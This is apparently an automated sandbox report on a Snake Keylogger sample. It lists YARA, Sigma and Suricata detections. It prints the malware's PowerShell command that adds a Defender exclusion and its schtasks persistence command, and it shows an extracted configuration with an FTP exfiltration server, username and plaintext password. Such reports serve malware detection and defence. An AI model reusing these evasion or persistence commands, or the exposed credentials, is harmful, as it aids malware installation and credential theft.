0.2.pedido.pif.exe.4c20eb0.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x7bfb7:$x1: $%SMTPDV$ 0x9c9d7:$x1: $%SMTPDV$ 0xbd1f7:$x1: $%SMTPDV$ 0x7a998:$x2: $#TheHashHere%& 0x9b3b8:$x2: $#TheHashHere%& 0xbbbd8:$x2: $#TheHashHere%& 0x7a944:$x3: %FTPDV$ 0x9b364:$x3: %FTPDV$ 0xbbb84:$x3: %FTPDV$ 0x7c08d:$x4: $%TelegramDv$ 0x9caad:$x4: $%TelegramDv$ 0xbd2cd:$x4: $%TelegramDv$ 0x7824e:$x5: KeyLoggerEventArgs 0x785e3:$x5: KeyLoggerEventArgs 0x98c6e:$x5: KeyLoggerEventArgs 0x99003:$x5: KeyLoggerEventArgs 0xb948e:$x5: KeyLoggerEventArgs 0xb9823:$x5: KeyLoggerEventArgs 0x7bf83:$m2: Clipboard Logs ID 0x7c1dd:$m2: Screenshot Logs ID 0x7c2ed:$m2: keystroke Logs ID
9.2.RePUtenbQjvc.exe.431fca8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RePUtenbQjvc.exe.431fca8.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.RePUtenbQjvc.exe.431fca8.0.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.RePUtenbQjvc.exe.431fca8.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a26:$a1: get_encryptedPassword 0x35246:$a1: get_encryptedPassword 0x14d12:$a2: get_encryptedUsername 0x35532:$a2: get_encryptedUsername 0x14832:$a3: get_timePasswordChanged 0x35052:$a3: get_timePasswordChanged 0x1492d:$a4: get_passwordField 0x3514d:$a4: get_passwordField 0x14a3c:$a5: set_encryptedPassword 0x3525c:$a5: set_encryptedPassword 0x16060:$a7: get_logins 0x36880:$a7: get_logins 0x15fc3:$a10: KeyLoggerEventArgs 0x367e3:$a10: KeyLoggerEventArgs 0x15c2e:$a11: KeyLoggerEventArgsEventHandler 0x3644e:$a11: KeyLoggerEventArgsEventHandler
9.2.RePUtenbQjvc.exe.431fca8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155de:$s1: UnHook 0x35dfe:$s1: UnHook 0x155e5:$s2: SetHook 0x35e05:$s2: SetHook 0x155ed:$s3: CallNextHook 0x35e0d:$s3: CallNextHook 0x155fa:$s4: _hook 0x35e1a:$s4: _hook
9.2.RePUtenbQjvc.exe.431fca8.0.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19997:$x1: $%SMTPDV$ 0x3a1b7:$x1: $%SMTPDV$ 0x18378:$x2: $#TheHashHere%& 0x38b98:$x2: $#TheHashHere%& 0x18324:$x3: %FTPDV$ 0x38b44:$x3: %FTPDV$ 0x19a6d:$x4: $%TelegramDv$ 0x3a28d:$x4: $%TelegramDv$ 0x15c2e:$x5: KeyLoggerEventArgs 0x15fc3:$x5: KeyLoggerEventArgs 0x3644e:$x5: KeyLoggerEventArgs 0x367e3:$x5: KeyLoggerEventArgs 0x19963:$m2: Clipboard Logs ID 0x19bbd:$m2: Screenshot Logs ID 0x19ccd:$m2: keystroke Logs ID 0x3a183:$m2: Clipboard Logs ID 0x3a3dd:$m2: Screenshot Logs ID 0x3a4ed:$m2: keystroke Logs ID 0x19fa7:$m3: SnakePW 0x3a7c7:$m3: SnakePW 0x19b95:$m4: \SnakeKeylogger\
0.2.pedido.pif.exe.4bbe890.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.pedido.pif.exe.4bbe890.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.pedido.pif.exe.4bbe890.0.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.pedido.pif.exe.4bbe890.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd9666:$a1: get_encryptedPassword 0xfa086:$a1: get_encryptedPassword 0x11a8a6:$a1: get_encryptedPassword 0xd9952:$a2: get_encryptedUsername 0xfa372:$a2: get_encryptedUsername 0x11ab92:$a2: get_encryptedUsername 0xd9472:$a3: get_timePasswordChanged 0xf9e92:$a3: get_timePasswordChanged 0x11a6b2:$a3: get_timePasswordChanged 0xd956d:$a4: get_passwordField 0xf9f8d:$a4: get_passwordField 0x11a7ad:$a4: get_passwordField 0xd967c:$a5: set_encryptedPassword 0xfa09c:$a5: set_encryptedPassword 0x11a8bc:$a5: set_encryptedPassword 0xdaca0:$a7: get_logins 0xfb6c0:$a7: get_logins 0x11bee0:$a7: get_logins 0xdac03:$a10: KeyLoggerEventArgs 0xfb623:$a10: KeyLoggerEventArgs 0x11be43:$a10: KeyLoggerEventArgs
0.2.pedido.pif.exe.4bbe890.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xda21e:$s1: UnHook 0xfac3e:$s1: UnHook 0x11b45e:$s1: UnHook 0xda225:$s2: SetHook 0xfac45:$s2: SetHook 0x11b465:$s2: SetHook 0xda22d:$s3: CallNextHook 0xfac4d:$s3: CallNextHook 0x11b46d:$s3: CallNextHook 0xda23a:$s4: _hook 0xfac5a:$s4: _hook 0x11b47a:$s4: _hook
0.2.pedido.pif.exe.4bbe890.0.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xde5d7:$x1: $%SMTPDV$ 0xfeff7:$x1: $%SMTPDV$ 0x11f817:$x1: $%SMTPDV$ 0xdcfb8:$x2: $#TheHashHere%& 0xfd9d8:$x2: $#TheHashHere%& 0x11e1f8:$x2: $#TheHashHere%& 0xdcf64:$x3: %FTPDV$ 0xfd984:$x3: %FTPDV$ 0x11e1a4:$x3: %FTPDV$ 0xde6ad:$x4: $%TelegramDv$ 0xff0cd:$x4: $%TelegramDv$ 0x11f8ed:$x4: $%TelegramDv$ 0xda86e:$x5: KeyLoggerEventArgs 0xdac03:$x5: KeyLoggerEventArgs 0xfb28e:$x5: KeyLoggerEventArgs 0xfb623:$x5: KeyLoggerEventArgs 0x11baae:$x5: KeyLoggerEventArgs 0x11be43:$x5: KeyLoggerEventArgs 0xde5a3:$m2: Clipboard Logs ID 0xde7fd:$m2: Screenshot Logs ID 0xde90d:$m2: keystroke Logs ID
9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a26:$a1: get_encryptedPassword 0x35446:$a1: get_encryptedPassword 0x55c66:$a1: get_encryptedPassword 0x14d12:$a2: get_encryptedUsername 0x35732:$a2: get_encryptedUsername 0x55f52:$a2: get_encryptedUsername 0x14832:$a3: get_timePasswordChanged 0x35252:$a3: get_timePasswordChanged 0x55a72:$a3: get_timePasswordChanged 0x1492d:$a4: get_passwordField 0x3534d:$a4: get_passwordField 0x55b6d:$a4: get_passwordField 0x14a3c:$a5: set_encryptedPassword 0x3545c:$a5: set_encryptedPassword 0x55c7c:$a5: set_encryptedPassword 0x16060:$a7: get_logins 0x36a80:$a7: get_logins 0x572a0:$a7: get_logins 0x15fc3:$a10: KeyLoggerEventArgs 0x369e3:$a10: KeyLoggerEventArgs 0x57203:$a10: KeyLoggerEventArgs
9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155de:$s1: UnHook 0x35ffe:$s1: UnHook 0x5681e:$s1: UnHook 0x155e5:$s2: SetHook 0x36005:$s2: SetHook 0x56825:$s2: SetHook 0x155ed:$s3: CallNextHook 0x3600d:$s3: CallNextHook 0x5682d:$s3: CallNextHook 0x155fa:$s4: _hook 0x3601a:$s4: _hook 0x5683a:$s4: _hook
9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19997:$x1: $%SMTPDV$ 0x3a3b7:$x1: $%SMTPDV$ 0x5abd7:$x1: $%SMTPDV$ 0x18378:$x2: $#TheHashHere%& 0x38d98:$x2: $#TheHashHere%& 0x595b8:$x2: $#TheHashHere%& 0x18324:$x3: %FTPDV$ 0x38d44:$x3: %FTPDV$ 0x59564:$x3: %FTPDV$ 0x19a6d:$x4: $%TelegramDv$ 0x3a48d:$x4: $%TelegramDv$ 0x5acad:$x4: $%TelegramDv$ 0x15c2e:$x5: KeyLoggerEventArgs 0x15fc3:$x5: KeyLoggerEventArgs 0x3664e:$x5: KeyLoggerEventArgs 0x369e3:$x5: KeyLoggerEventArgs 0x56e6e:$x5: KeyLoggerEventArgs 0x57203:$x5: KeyLoggerEventArgs 0x19963:$m2: Clipboard Logs ID 0x19bbd:$m2: Screenshot Logs ID 0x19ccd:$m2: keystroke Logs ID
Click to see the 48 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\pedido.pif.exe", ParentImage: C:\Users\user\Desktop\pedido.pif.exe, ParentProcessId: 3508, ParentProcessName: pedido.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe", ProcessId: 3032, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp4B59.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp4B59.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe, ParentImage: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe, ParentProcessId: 6768, ParentProcessName: RePUtenbQjvc.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp4B59.tmp", ProcessId: 4536, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp30EC.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp30EC.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\pedido.pif.exe", ParentImage: C:\Users\user\Desktop\pedido.pif.exe, ParentProcessId: 3508, ParentProcessName: pedido.pif.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp30EC.tmp", ProcessId: 1344, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\pedido.pif.exe", ParentImage: C:\Users\user\Desktop\pedido.pif.exe, ParentProcessId: 3508, ParentProcessName: pedido.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe", ProcessId: 3032, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp30EC.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp30EC.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\pedido.pif.exe", ParentImage: C:\Users\user\Desktop\pedido.pif.exe, ParentProcessId: 3508, ParentProcessName: pedido.pif.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp30EC.tmp", ProcessId: 1344, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T10:37:31.970587+0100	2803305	3	Unknown Traffic	192.168.2.8	49712	188.114.96.3	443	TCP
2024-10-31T10:37:36.342963+0100	2803305	3	Unknown Traffic	192.168.2.8	49718	188.114.96.3	443	TCP
2024-10-31T10:37:38.676887+0100	2803305	3	Unknown Traffic	192.168.2.8	49724	188.114.96.3	443	TCP
2024-10-31T10:37:39.213388+0100	2803305	3	Unknown Traffic	192.168.2.8	49725	188.114.96.3	443	TCP
2024-10-31T10:37:40.102849+0100	2803305	3	Unknown Traffic	192.168.2.8	49728	188.114.96.3	443	TCP
2024-10-31T10:37:40.647699+0100	2803305	3	Unknown Traffic	192.168.2.8	49731	188.114.96.3	443	TCP
2024-10-31T10:37:46.637388+0100	2803305	3	Unknown Traffic	192.168.2.8	55433	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T10:37:30.064323+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49709	193.122.130.0	80	TCP
2024-10-31T10:37:31.267463+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49709	193.122.130.0	80	TCP
2024-10-31T10:37:32.704929+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49713	193.122.130.0	80	TCP
2024-10-31T10:37:36.751825+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49719	193.122.130.0	80	TCP
2024-10-31T10:37:37.986202+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49719	193.122.130.0	80	TCP
2024-10-31T10:37:39.392475+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49726	193.122.130.0	80	TCP

ETPRO MALWARE SnakeKeylogger Exfil via FTP M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T10:37:17.477429+0100	2845532	1	Malware Command and Control Activity Detected	192.168.2.8	55434	50.31.176.103	21	TCP
2024-10-31T10:37:17.477429+0100	2845532	1	Malware Command and Control Activity Detected	192.168.2.8	55438	50.31.176.103	21	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "FTP", "FTP Server": "ftp://50.31.176.103/", "FTP Username": "somac@gdmaduanas.com", "Password": "HW=f09RQ-BL1", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: pedido.pif.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: pedido.pif.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: pedido.pif.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49721 version: TLS 1.0

Source: pedido.pif.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: AAjd.pdb source: pedido.pif.exe, RePUtenbQjvc.exe.0.dr
Source:	Binary string: AAjd.pdbSHA256 source: pedido.pif.exe, RePUtenbQjvc.exe.0.dr

Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 0D6A6A2Bh	0_2_0D6A61A5
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 0124E61Fh	7_2_0124E431
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 0124EFA9h	7_2_0124E431
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 0124FA39h	7_2_0124F778
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_0124E005
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_0124D7F0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_0124DE23
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 058E88EDh	7_2_058E85B0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 058E5869h	7_2_058E55C0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 058E7FA9h	7_2_058E7D00
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 058E53E9h	7_2_058E5140
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 058E8401h	7_2_058E8158
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 058E0741h	7_2_058E0498
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 058E7B51h	7_2_058E78A8
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 058E0B99h	7_2_058E08F0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 058E02E9h	7_2_058E0040
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 058E76F9h	7_2_058E7450
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 058E72A2h	7_2_058E6FF8
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 058E69C9h	7_2_058E6720
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_058E3350
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_058E3360
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 058E6E21h	7_2_058E6B78
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 058E6571h	7_2_058E62C8
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 058E5CC1h	7_2_058E5A18
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 4x nop then jmp 058E6119h	7_2_058E5E70
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 02825CC3h	9_2_02825441
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 0293FA39h	12_2_0293F778
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 0293E61Fh	12_2_0293E431
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 0293EFA9h	12_2_0293E431
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_0293D7F0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 067388EDh	12_2_067385B0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 06736119h	12_2_06735E70
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	12_2_06733676
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	12_2_0673FE02
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 067369C9h	12_2_06736720
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 067372A2h	12_2_06736FF8
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 067376F9h	12_2_06737450
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 06730741h	12_2_06730498
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 06737FA9h	12_2_06737D00
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 06735869h	12_2_067355C0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 06735CC1h	12_2_06735A18
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 06736571h	12_2_067362C8
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 06736E21h	12_2_06736B78
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	12_2_06733360
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	12_2_06733350
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 067302E9h	12_2_06730040
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 06730B99h	12_2_067308F0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 06737B51h	12_2_067378A8
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 06738401h	12_2_06738158
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 4x nop then jmp 067353E9h	12_2_06735140

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2845532 - Severity 1 - ETPRO MALWARE SnakeKeylogger Exfil via FTP M1 : 192.168.2.8:55434 -> 50.31.176.103:21
Source: Network traffic	Suricata IDS: 2845532 - Severity 1 - ETPRO MALWARE SnakeKeylogger Exfil via FTP M1 : 192.168.2.8:55438 -> 50.31.176.103:21

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.pedido.pif.exe.4c834d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RePUtenbQjvc.exe.431fca8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.8:55437 -> 50.31.176.103:33160

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: SERVERCENTRALUS SERVERCENTRALUS

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49726 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49713 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49709 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49719 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49728 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49731 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49712 -> 188.114.96.3:443
